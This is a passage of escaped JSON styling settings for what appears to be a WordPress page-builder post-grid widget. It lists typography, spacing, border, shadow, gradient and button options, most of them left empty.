\",\"size\":\"\",\"sizes\":[]},\"featured_terms_link_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"featured_terms_link_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"featured_terms_link_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_terms_link_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_terms_link_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_terms_link_text_decor\":\"none\",\"featured_terms_link_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_terms_link_border_radius_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_terms_link_border_radius_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_terms_link_border_border\":\"\",\"featured_terms_link_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_terms_link_border_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_terms_link_border_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_terms_link_border_color\":\"\",\"featured_terms_link_box_shadow_box_shadow_type\":\"\",\"featured_terms_link_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"featured_terms_link_box_shadow_box_shadow_position\":\" \",\"featured_terms_link_hover_bg_color\":\"\",\"featured_terms_link_hover_color\":\"\",\"featured_terms_link_hover_typography_typography\":\"\",\"featured_terms_link_hover_typography_font_family\":\"\",\"featured_terms_link_hover_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_terms_link_hover_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_terms_link_hover_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_terms_link_hover_typography_font_weight\":\"\",\"featured_terms_link_hover_typography_text_transform\":\"\",\"featured_terms_link_hover_typography_font_style\":\"\",\"featured_terms_link_hover_typography_text_decoration\":\"\",\"featured_terms_link_hover_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"featured_terms_link_hover_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"featured_terms_link_hover_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"featured_terms_link_hover_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_terms_link_hover_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_terms_link_hover_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_terms_link_hover_text_decor\":\"none\",\"featured_terms_link_hover_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_terms_link_hover_border_radius_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_terms_link_hover_border_radius_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_terms_link_hover_border_border\":\"\",\"featured_terms_link_hover_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_terms_link_hover_border_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_terms_link_hover_border_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_terms_link_hover_border_color\":\"\",\"featured_terms_link_hover_box_shadow_box_shadow_type\":\"\",\"featured_terms_link_hover_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"featured_terms_link_hover_box_shadow_box_shadow_position\":\" \",\"featured_terms_link_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_terms_link_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_terms_link_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_content_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_content_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_content_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_background_background\":\"\",\"post_background_color\":\"\",\"post_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"post_background_color_b\":\"#f2295b\",\"post_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"post_background_gradient_type\":\"linear\",\"post_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"post_background_gradient_position\":\"center center\",\"post_background_image\":{\"url\":\"\",\"id\":\"\"},\"post_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"post_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"post_background_position\":\"\",\"post_background_position_tablet\":\"\",\"post_background_position_mobile\":\"\",\"post_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"post_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"post_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"post_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"post_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"post_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"post_background_attachment\":\"\",\"post_background_repeat\":\"\",\"post_background_repeat_tablet\":\"\",\"post_background_repeat_mobile\":\"\",\"post_background_size\":\"\",\"post_background_size_tablet\":\"\",\"post_background_size_mobile\":\"\",\"post_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"post_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"post_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"post_background_video_link\":\"\",\"post_background_video_start\":\"\",\"post_background_video_end\":\"\",\"post_background_play_once\":\"\",\"post_background_play_on_mobile\":\"\",\"post_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"post_background_slideshow_gallery\":[],\"post_background_slideshow_loop\":\"yes\",\"post_background_slideshow_slide_duration\":5000,\"post_background_slideshow_slide_transition\":\"fade\",\"post_background_slideshow_transition_duration\":500,\"post_background_slideshow_ken_burns\":\"\",\"post_background_slideshow_ken_burns_zoom_direction\":\"in\",\"post_border_border\":\"\",\"post_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_border_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_border_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_border_color\":\"\",\"post_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_border_radius_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_border_radius_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_box_shadow_box_shadow_type\":\"\",\"post_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"post_box_shadow_box_shadow_position\":\" \",\"post_thumb_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_thumb_border_radius_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_thumb_border_radius_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_overlay_background_normal_background\":\"\",\"post_overlay_background_normal_color\":\"\",\"post_overlay_background_normal_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"post_overlay_background_normal_color_b\":\"#f2295b\",\"post_overlay_background_normal_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"post_overlay_background_normal_gradient_type\":\"linear\",\"post_overlay_background_normal_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"post_overlay_background_normal_gradient_position\":\"center center\",\"post_overlay_background_normal_image\":{\"url\":\"\",\"id\":\"\"},\"post_overlay_background_normal_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"post_overlay_background_normal_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"post_overlay_background_normal_position\":\"\",\"post_overlay_background_normal_position_tablet\":\"\",\"post_overlay_background_normal_position_mobile\":\"\",\"post_overlay_background_normal_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"post_overlay_background_normal_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"post_overlay_background_normal_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"post_overlay_background_normal_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"post_overlay_background_normal_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"post_overlay_background_normal_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"post_overlay_background_normal_attachment\":\"\",\"post_overlay_background_normal_repeat\":\"\",\"post_overlay_background_normal_repeat_tablet\":\"\",\"post_overlay_background_normal_repeat_mobile\":\"\",\"post_overlay_background_normal_size\":\"\",\"post_overlay_background_normal_size_tablet\":\"\",\"post_overlay_background_normal_size_mobile\":\"\",\"post_overlay_background_normal_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"post_overlay_background_normal_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"post_overlay_background_normal_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"post_overlay_background_normal_video_link\":\"\",\"post_overlay_background_normal_video_start\":\"\",\"post_overlay_background_normal_video_end\":\"\",\"post_overlay_background_normal_play_once\":\"\",\"post_overlay_background_normal_play_on_mobile\":\"\",\"post_overlay_background_normal_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"post_overlay_background_normal_slideshow_gallery\":[],\"post_overlay_background_normal_slideshow_loop\":\"yes\",\"post_overlay_background_normal_slideshow_slide_duration\":5000,\"post_overlay_background_normal_slideshow_slide_transition\":\"fade\",\"post_overlay_background_normal_slideshow_transition_duration\":500,\"post_overlay_background_normal_slideshow_ken_burns\":\"\",\"post_overlay_background_normal_slideshow_ken_burns_zoom_direction\":\"in\",\"post_overlay_background_hover_background\":\"\",\"post_overlay_background_hover_color\":\"\",\"post_overlay_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"post_overlay_background_hover_color_b\":\"#f2295b\",\"post_overlay_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"post_overlay_background_hover_gradient_type\":\"linear\",\"post_overlay_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"post_overlay_background_hover_gradient_position\":\"center center\",\"post_overlay_background_hover_image\":{\"url\":\"\",\"id\":\"\"},\"post_overlay_background_hover_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"post_overlay_background_hover_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"post_overlay_background_hover_position\":\"\",\"post_overlay_background_hover_position_tablet\":\"\",\"post_overlay_background_hover_position_mobile\":\"\",\"post_overlay_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"post_overlay_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"post_overlay_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"post_overlay_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"post_overlay_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"post_overlay_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"post_overlay_background_hover_attachment\":\"\",\"post_overlay_background_hover_repeat\":\"\",\"post_overlay_background_hover_repeat_tablet\":\"\",\"post_overlay_background_hover_repeat_mobile\":\"\",\"post_overlay_background_hover_size\":\"\",\"post_overlay_background_hover_size_tablet\":\"\",\"post_overlay_background_hover_size_mobile\":\"\",\"post_overlay_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"post_overlay_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"post_overlay_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"post_overlay_background_hover_video_link\":\"\",\"post_overlay_background_hover_video_start\":\"\",\"post_overlay_background_hover_video_end\":\"\",\"post_overlay_background_hover_play_once\":\"\",\"post_overlay_background_hover_play_on_mobile\":\"\",\"post_overlay_background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"post_overlay_background_hover_slideshow_gallery\":[],\"post_overlay_background_hover_slideshow_loop\":\"yes\",\"post_overlay_background_hover_slideshow_slide_duration\":5000,\"post_overlay_background_hover_slideshow_slide_transition\":\"fade\",\"post_overlay_background_hover_slideshow_transition_duration\":500,\"post_overlay_background_hover_slideshow_ken_burns\":\"\",\"post_overlay_background_hover_slideshow_ken_burns_zoom_direction\":\"in\",\"post_title_color_hover\":\"\",\"post_title_typography_font_family\":\"\",\"post_title_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"post_title_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"post_title_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"post_title_typography_text_transform\":\"\",\"post_title_typography_font_style\":\"\",\"post_title_typography_text_decoration\":\"\",\"post_title_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"post_title_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"post_title_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"post_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"post_title_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"post_title_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"post_title_text_decoration_hover\":\"\",\"post_title_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_title_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_title_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_title_alignment\":\"\",\"post_title_alignment_tablet\":\"\",\"post_title_alignment_mobile\":\"\",\"post_text_typography_font_family\":\"\",\"post_text_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"post_text_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"post_text_typography_font_weight\":\"\",\"post_text_typography_text_transform\":\"\",\"post_text_typography_font_style\":\"\",\"post_text_typography_text_decoration\":\"\",\"post_text_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"post_text_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"post_text_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"post_text_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"post_text_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"post_text_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"post_text_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_text_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_text_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_text_alignment\":\"\",\"post_text_alignment_tablet\":\"\",\"post_text_alignment_mobile\":\"\",\"meta_icon_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"meta_icon_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"meta_bg\":\"\",\"meta_color\":\"\",\"meta_link_color\":\"\",\"meta_link_color_hover\":\"\",\"meta_typography_typography\":\"\",\"meta_typography_font_family\":\"\",\"meta_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"meta_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"meta_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"meta_typography_font_weight\":\"\",\"meta_typography_text_transform\":\"\",\"meta_typography_font_style\":\"\",\"meta_typography_text_decoration\":\"\",\"meta_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"meta_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"meta_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"meta_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"meta_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"meta_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"meta_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"meta_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"meta_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"meta_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"meta_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"meta_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"meta_alignment\":\"left\",\"meta_alignment_tablet\":\"\",\"meta_alignment_mobile\":\"\",\"meta_divider\":\"\",\"meta_divider_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"meta_divider_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"meta_divider_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"post_add_button_icon\":\"\",\"post_button_icon\":\"\",\"post_button_icon_position\":\"1\",\"post_button_icon_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"post_button_icon_color\":\"\",\"post_button_icon_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_button_icon_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_button_icon_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_button_bg\":\"color\",\"post_button_bg_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"post_button_bg_color_b\":\"#f2295b\",\"post_button_bg_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"post_button_bg_gradient_type\":\"linear\",\"post_button_bg_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"post_button_bg_gradient_position\":\"center center\",\"post_button_color\":\"\",\"post_button_typography_typography\":\"\",\"post_button_typography_font_family\":\"\",\"post_button_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"post_button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"post_button_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"post_button_typography_font_weight\":\"\",\"post_button_typography_text_transform\":\"\",\"post_button_typography_font_style\":\"\",\"post_button_typography_text_decoration\":\"\",\"post_button_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"post_button_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"post_button_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"post_button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"post_button_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"post_button_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"post_button_text_decor\":\"none\",\"post_button_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_button_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_button_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_button_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_button_border_radius_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_button_border_radius_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_button_border_border\":\"\",\"post_button_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_button_border_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_button_border_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_button_border_color\":\"\",\"post_button_box_shadow_box_shadow_type\":\"\",\"post_button_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"post_button_box_shadow_box_shadow_position\":\" \",\"post_button_hover_bg\":\"color\",\"post_button_hover_bg_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"post_button_hover_bg_color_b\":\"#f2295b\",\"post_button_hover_bg_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"post_button_hover_bg_gradient_type\":\"linear\",\"post_button_hover_bg_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"post_button_hover_bg_gradient_position\":\"center center\",\"post_button_hover_color\":\"\",\"post_button_hover_typography_typography\":\"\",\"post_button_hover_typography_font_family\":\"\",\"post_button_hover_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"post_button_hover_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"post_button_hover_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"post_button_hover_typography_font_weight\":\"\",\"post_button_hover_typography_text_transform\":\"\",\"post_button_hover_typography_font_style\":\"\",\"post_button_hover_typography_text_decoration\":\"\",\"post_button_hover_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"post_button_hover_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"post_button_hover_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"post_button_hover_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"post_button_hover_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"post_button_hover_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"post_button_hover_text_decor\":\"none\",\"post_button_hover_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_button_hover_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_button_hover_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_button_hover_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_button_hover_border_radius_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_button_hover_border_radius_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_button_hover_border_border\":\"\",\"post_button_hover_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_button_hover_border_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_button_hover_border_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_button_hover_border_color\":\"\",\"post_button_hover_box_shadow_box_shadow_type\":\"\",\"post_button_hover_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"post_button_hover_box_shadow_box_shadow_position\":\" 